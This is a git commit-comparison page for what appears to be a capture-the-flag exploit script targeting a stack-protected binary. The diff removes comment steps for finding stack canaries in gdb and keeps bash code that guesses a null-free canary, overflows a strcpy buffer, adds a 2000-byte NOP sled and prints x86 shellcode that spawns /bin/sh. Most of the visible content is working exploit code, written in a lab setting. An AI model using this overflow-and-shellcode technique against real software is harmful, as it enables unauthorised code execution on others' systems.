Compare commits
1 commit
731478bcdf
...
688fdcd404
| Author | SHA1 | Date | |
|---|---|---|---|
|
688fdcd404
|
1 changed files with 2 additions and 15 deletions
|
|
@ -2,20 +2,7 @@
|
||||||
|
|
||||||
# flag{CANARY_IS_ALSO_AN_ISLAND}
|
# flag{CANARY_IS_ALSO_AN_ISLAND}
|
||||||
|
|
||||||
##### Exploit Creation Steps #####
|
######### Exploit #########
|
||||||
# Step 1: Locate address of 'int stack_canaries [10]' using gdb
|
|
||||||
# Command: disas owerflow
|
|
||||||
# -> 0x56559020
|
|
||||||
##################################
|
|
||||||
# Step 2: Print all 10 possible stack canaries in gdb
|
|
||||||
# Command: x/10xw 0x56559020
|
|
||||||
##################################
|
|
||||||
# Step 3: Select only those canaries that do not contain a null byte
|
|
||||||
##################################
|
|
||||||
# Step 4: Combine Slide Rider with the selected stack canaries
|
|
||||||
##################################
|
|
||||||
|
|
||||||
############ Exploit ##############
|
|
||||||
# Step 1: Choose a random canary candidate and overwrite the buffer with 'A's, then insert the canary candidate.
|
# Step 1: Choose a random canary candidate and overwrite the buffer with 'A's, then insert the canary candidate.
|
||||||
# Note: Only canaries without null bytes can be used due to the use of strcpy.
|
# Note: Only canaries without null bytes can be used due to the use of strcpy.
|
||||||
case $(( RANDOM % 3 )) in
|
case $(( RANDOM % 3 )) in
|
||||||
|
|
@ -38,4 +25,4 @@ printf "\x90%.0s" {1..2000}
|
||||||
|
|
||||||
# Step 4: Write the provided shellcode to stdout
|
# Step 4: Write the provided shellcode to stdout
|
||||||
printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
|
printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
|
||||||
###################################
|
###########################
|
||||||
Loading…
Add table
Add a link
Reference in a new issue